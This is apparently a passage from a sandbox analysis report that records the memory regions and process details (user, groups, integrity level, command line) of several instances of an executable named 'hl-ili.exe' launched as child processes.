start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18686 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18687 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18688 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18689 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18690 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18691 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Thread: id = 150 os_tid = 0xf34 Process: id = "28" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x7b78d000" os_pid = "0xf48" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18698 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18699 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18700 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18701 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18702 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18703 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18704 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18705 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18706 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18707 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18708 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18709 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18710 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18711 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18712 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Process: id = "29" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x7b592000" os_pid = "0xdfc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18718 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18719 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18720 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18721 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18722 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18723 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18724 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18725 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18726 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18727 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18728 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18729 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18730 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18731 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18732 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Process: id = "30" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x7ae97000" os_pid = "0xaa0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18738 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18739 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18740 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18741 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18742 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18743 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18744 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18745 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18746 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18747 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18748 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18749 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18750 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18751 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18752 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Process: id = "31" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x219c000" os_pid = "0x2d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]